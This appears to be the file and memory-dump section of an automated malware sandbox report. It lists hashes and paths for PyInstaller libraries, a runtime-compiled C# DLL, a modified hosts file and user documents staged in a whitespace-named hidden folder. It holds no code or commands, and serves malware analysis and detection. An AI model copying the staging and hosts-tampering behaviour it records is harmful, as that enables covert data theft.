C:\Users\Admin\AppData\Local\Temp\_MEI30482\sqlite3.dll

Filesize
607KB

MD5
abe8eec6b8876ddad5a7d60640664f40

SHA1
0b3b948a1a29548a73aaf8d8148ab97616210473

SHA256
26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d

SHA512
de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30482\unicodedata.pyd

Filesize
295KB

MD5
908e8c719267692de04434ab9527f16e

SHA1
5657def35fbd3e5e088853f805eddd6b7b2b3ce9

SHA256
4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239

SHA512
4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xsp2mofe.qbv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\arrifrk4\arrifrk4.dll

Filesize
4KB

MD5
0a041f6e1349625bad970ff56eebbeeb

SHA1
e4974b9ae335b8f2bf47d62f3d3d2ef0a9706157

SHA256
ef4e3ccd57110cd1d2beb05b96b967393e278767508436be65c25575fc2bc59b

SHA512
80a60bb005fe78128a3788e725dd1bd4e3bf4898b0d14f570c90fdeaa448e2a1a4d69d49b6f546f85fe0fbd3c492d400891ba6ad0719447f0649fea1edf98410

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\AddCheckpoint.jpg

Filesize
1.1MB

MD5
ac933a6d9d0ed891163028237ee43f6d

SHA1
11f3a96a161bbd2af4734d9ac45d53cee89b61f1

SHA256
c8e37883be9c66dfd8fd8bae2e3c61c2d72404649f30fee79c0c61195604ea30

SHA512
f0164fe117712d1306e3de81a13e8c0029217c6acead04bc65d40f6cdea43ee0ec1ad8d63c8ebe77f77a010dac35792034646e5989545cb752afe67a7db2fe16

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\AddTrace.docx

Filesize
14KB

MD5
2ff40a4006cf5b0b1765cb8f89a1a3a0

SHA1
76677d853e2ce8e04413c0dd9d089deba6f0482b

SHA256
2abb98a9c965da53491715b4d3e282f584f204f08de23885d2717ebcb8ea18d8

SHA512
aec699b31356fbcc922ffe2e8c00e69093b0f4b90185e4ff3d0d8c5fc2d702fbe2ca3277fb04e2a1f4425dedb30972ae0dcdf0dbe4b0029ea644bee30232aee7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\BackupNew.docx

Filesize
19KB

MD5
a5b5d5bd1dabfa2c25ccd413b8637122

SHA1
622977145b8923076a021ec760ff5a33aeb28574

SHA256
1bf16c850a2c3b5176b14354fa94c7ec9ee36c4ffd18ed4bec45c8faa1854274

SHA512
9b9a8d3fb3a2d5b960dc548bc974d10d8c1a1b6f828e7d2475665ff79aa5ea1f6a77acec10dc1bc645b1ad536b132d0bcfc702687516ef1e34123363c2ca2d95

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\PingComplete.docx

Filesize
17KB

MD5
03913b9e9664c2a5f8dd05263ed26041

SHA1
fa80d7940aec6a09c26acc200ef3cff54eb2ba70

SHA256
087bb45d9204589d04aa766fbf53b58d8e5afd846c992ff34487160bb78387c9

SHA512
bee4954654b574e0e31f16231692badbf0c1a00620494d9ce49aa6e896f986149ad47ae13ba549c64c7a3ea2e6b5994367a5b59608f20acc1dd9c7dc6731415d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\RevokeRequest.docx

Filesize
13KB

MD5
5ab884fefe8f9e8cb62d1747d7e644df

SHA1
9cfec96349841a1e297c0a8eb5576e029e6c9bce

SHA256
6473cfd53db32ab8dbbc3f7ecf7c1ac0cf103984eebd6d14a1bd48fda94b1bc9

SHA512
cd645ecd3f64b62237dfb40daf2cb4d3bacb058cb37b6e41bb6deb6fc821ff00496e7a1f97b9ccd9b0d1708a5b9396826b2022ce4f112d08c5d50af4ef189161

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\SyncHide.docx

Filesize
14KB

MD5
ae4c87fc7d969800864702f18a174132

SHA1
5ed46e38a7d5d6aee1961f33038cd556bf57e250

SHA256
127342c703512a82d52a1dff178f6e68f641df3d84d3b24d898821e60eb37946

SHA512
8af2afd6a99203b017812b455203759c9c5bf0f914615584d3de8c44aa51f5dca7719bc7367007cdb0b38233632d7ce5d34fe06c43c84d4cf77c88d665378e28

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\TraceDisconnect.xlsx

Filesize
11KB

MD5
6aea2bf6f312a35cc350a2eea380d509

SHA1
2511dc16cf200c7e29990fd7a145d0689799bbb4

SHA256
4a4ed1a7db477e9d45d7a9be57bdc75b5e2929fc3558034d2c24d03260a07dc0

SHA512
0a150880e9814d11d15758b5195338d2839b0191785f23ebc2a85d08d819b3dcd850f2f2c4df16e08a274fd3515aa2c10b80a70db10156230ebdd16f53dadf9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\ConfirmUpdate.xlsx

Filesize
11KB

MD5
8c616da0aeca2d0d8256ecf106b02efd

SHA1
b429d0b64e9abafe887a18b43c2696e94cd394eb

SHA256
81cda95b926e31433c86c53e80a3bde2aceaa91ca5ff6d6a4230dd6d8f272aff

SHA512
a854a4c9c1ba14c7bc7ed91d58c94318d775d9882950a9ba23d6ab648176cb2b5695839352eb4a937cbf8b7efc5ef38378e878a1115b482cb54783ecc26b662b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\HideStep.txt

Filesize
1.1MB

MD5
9acee1b8d6681840b01e62225316d24f

SHA1
32ec4ebb6413c77ee5482efff433d8d978fca00d

SHA256
1a6f3bc1518db8c3916fc99bb7b8218bc797485bc3259d6efa95196482f523fe

SHA512
7f79866079cf1a3f1ab5ffab249cc29a519107e7ebcc5073459dfa5589462350f26ca27713070033229412c8827c40f9e7f7fa5f60b6c2d456024da5e3356e58

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\MoveSync.xlsx

Filesize
13KB

MD5
f43ab0f5b8f28c3bcbd4e2331a04a745

SHA1
9d4fa8a93887868579f15efe8f60822d2d450990

SHA256
34431297c80cb17ddcbaed84ee05a9b08ced8a35fb2ca4b735786000e4b4ff62

SHA512
149e117c11155b9d92d4869112175c9a804aa08574ef23781ff528a6566bc4565abf8279ba7de2f68242291f4634b9ec9a7206e32597fe89b0cb149b4f2bb1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\RevokeUnblock.docx

Filesize
20KB

MD5
32ff46da7722712ba83edbc3dd550508

SHA1
5811113fd7bff1f781983a5b26758b8e81c4b905

SHA256
5c9900771f6754bd892081884280c9f84d201620e2ece67e1048cded571521b9

SHA512
bf5d55ac950102c5c5bba44f405368e71f5be37c9201dfc132e828d9c1e9c43828eb95c1cd337a2fc7ca277f0a94ba4b1bd5cbef735bda25147d0565504d091a

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\SetDebug.doc

Filesize
1.2MB

MD5
70acd6d483c9c790bf8627fb488d881d

SHA1
a1e75bdb3e4ce4a2deb51e3fb1645e06afff294e

SHA256
cae0c17c2b66a6111fbbfd28e1d9b5ae2bd5f27958f7ee790a937f79b4082944

SHA512
7ed439e036f4f5789a3a430765b995edd99b64f2f57fb1e6be139d53d23197286626e709761f51eb5cc49e64f2329bb78b61fb99f933900ebda03ff6db781e65

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\arrifrk4\CSCC96AF6DF398F401FB3EB5169FA0C176.TMP

Filesize
652B

MD5
da8a187f1c7dcb9594e1a625f64b88c6

SHA1
917763266be4b6bf45bb77fd7c12f741c048b241

SHA256
60ea710e62c5c0acd5882061ad8f8a2f04ec1280730857792b1a947620f6d42d

SHA512
9bf3037328a51ce8d701a971ba1d38dad61693ad4a2d859976dc810e339a4f1933d1139ca8aebbc5f3f2e1aae42da91b4c489f540c56c4d74715191a6dcf359c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\arrifrk4\arrifrk4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\arrifrk4\arrifrk4.cmdline

Filesize
607B

MD5
13ecd338cb31e454c2a8caa03f95d64f

SHA1
aa86c9f693381c25c4bb8c519cf275a7a68df4ca

SHA256
3acd527750375c70e382c5ed5e19f3d8e25094a4ece3ab47d56b30d6fbcfeb73

SHA512
aaed076227ba3eb324b1df9fd06853bc1d45c6e0b5375571c7998813e5dd17a2e73e5339cdd094698d04b4c6e023b9e4e256280eac1113d33e24e73106bdf449

Download Submit
memory/468-56-0x00007FFFC1C00000-0x00007FFFC1C19000-memory.dmp

Filesize
100KB

Download
memory/468-82-0x00007FFFBB4A0000-0x00007FFFBB5BC000-memory.dmp

Filesize
1.1MB

Download
memory/468-358-0x00000236E24E0000-0x00000236E2855000-memory.dmp

Filesize
3.5MB

Download
memory/468-184-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp

Filesize
1.4MB

Download
memory/468-48-0x00007FFFC5190000-0x00007FFFC519F000-memory.dmp

Filesize
60KB

Download
memory/468-78-0x00007FFFC0920000-0x00007FFFC092D000-memory.dmp

Filesize
52KB

Download
memory/468-63-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp

Filesize
100KB

Download
memory/468-337-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp

Filesize
5.9MB

Download
memory/468-70-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp

Filesize
5.9MB

Download
memory/468-54-0x00007FFFBDD60000-0x00007FFFBDD8D000-memory.dmp

Filesize
180KB

Download
memory/468-71-0x00007FFFBBF80000-0x00007FFFBC038000-memory.dmp

Filesize
736KB

Download
memory/468-343-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp

Filesize
1.4MB

Download
memory/468-346-0x00007FFFBC2F0000-0x00007FFFBC31E000-memory.dmp

Filesize
184KB

Download
memory/468-72-0x00000236E24E0000-0x00000236E2855000-memory.dmp

Filesize
3.5MB

Download
memory/468-224-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp

Filesize
100KB

Download
memory/468-73-0x00007FFFAC1B0000-0x00007FFFAC525000-memory.dmp

Filesize
3.5MB

Download
memory/468-282-0x00007FFFBC2F0000-0x00007FFFBC31E000-memory.dmp

Filesize
184KB

Download
memory/468-75-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp

Filesize
140KB

Download
memory/468-76-0x00007FFFC0830000-0x00007FFFC0844000-memory.dmp

Filesize
80KB

Download
memory/468-64-0x00007FFFC0930000-0x00007FFFC093D000-memory.dmp

Filesize
52KB

Download
memory/468-66-0x00007FFFBC2F0000-0x00007FFFBC31E000-memory.dmp

Filesize
184KB

Download
memory/468-60-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp

Filesize
1.4MB

Download
memory/468-58-0x00007FFFBCB70000-0x00007FFFBCB93000-memory.dmp

Filesize
140KB

Download
memory/468-94-0x00007FFFBCB70000-0x00007FFFBCB93000-memory.dmp

Filesize
140KB

Download
memory/468-338-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp

Filesize
140KB

Download
memory/468-347-0x00007FFFBBF80000-0x00007FFFBC038000-memory.dmp

Filesize
736KB

Download
memory/468-350-0x00007FFFC0920000-0x00007FFFC092D000-memory.dmp

Filesize
52KB

Download
memory/468-30-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp

Filesize
140KB

Download
memory/468-25-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp

Filesize
5.9MB

Download
memory/468-297-0x00007FFFBBF80000-0x00007FFFBC038000-memory.dmp

Filesize
736KB

Download
memory/468-298-0x00000236E24E0000-0x00000236E2855000-memory.dmp

Filesize
3.5MB

Download
memory/468-309-0x00007FFFAC1B0000-0x00007FFFAC525000-memory.dmp

Filesize
3.5MB

Download
memory/468-321-0x00007FFFC0830000-0x00007FFFC0844000-memory.dmp

Filesize
80KB

Download
memory/468-323-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp

Filesize
140KB

Download
memory/468-322-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp

Filesize
5.9MB

Download
memory/468-328-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp

Filesize
1.4MB

Download
memory/468-344-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp

Filesize
100KB

Download
memory/468-345-0x00007FFFC0930000-0x00007FFFC093D000-memory.dmp

Filesize
52KB

Download
memory/468-357-0x00007FFFBCB70000-0x00007FFFBCB93000-memory.dmp

Filesize
140KB

Download
memory/468-356-0x00007FFFC1C00000-0x00007FFFC1C19000-memory.dmp

Filesize
100KB

Download
memory/468-355-0x00007FFFBDD60000-0x00007FFFBDD8D000-memory.dmp

Filesize
180KB

Download
memory/468-354-0x00007FFFC5190000-0x00007FFFC519F000-memory.dmp

Filesize
60KB

Download
memory/468-353-0x00007FFFC0830000-0x00007FFFC0844000-memory.dmp

Filesize
80KB

Download
memory/468-352-0x00007FFFAC1B0000-0x00007FFFAC525000-memory.dmp

Filesize
3.5MB

Download
memory/468-351-0x00007FFFBB4A0000-0x00007FFFBB5BC000-memory.dmp

Filesize
1.1MB

Download
memory/1212-216-0x00000298D6680000-0x00000298D66C8000-memory.dmp

Filesize
288KB

Download
memory/2908-223-0x0000028BA88C0000-0x0000028BA8908000-memory.dmp

Filesize
288KB

Download
memory/3100-204-0x000001A1AAAE0000-0x000001A1AAAE8000-memory.dmp

Filesize
32KB

Download
memory/3100-222-0x000001A1AA960000-0x000001A1AA9A8000-memory.dmp

Filesize
288KB

Download
memory/3968-187-0x000001C8CD6D0000-0x000001C8CD718000-memory.dmp

Filesize
288KB

Download
memory/4144-213-0x000001FEDC460000-0x000001FEDC4A8000-memory.dmp

Filesize
288KB

Download
memory/4144-84-0x000001FEC3E30000-0x000001FEC3E52000-memory.dmp

Filesize
136KB

Download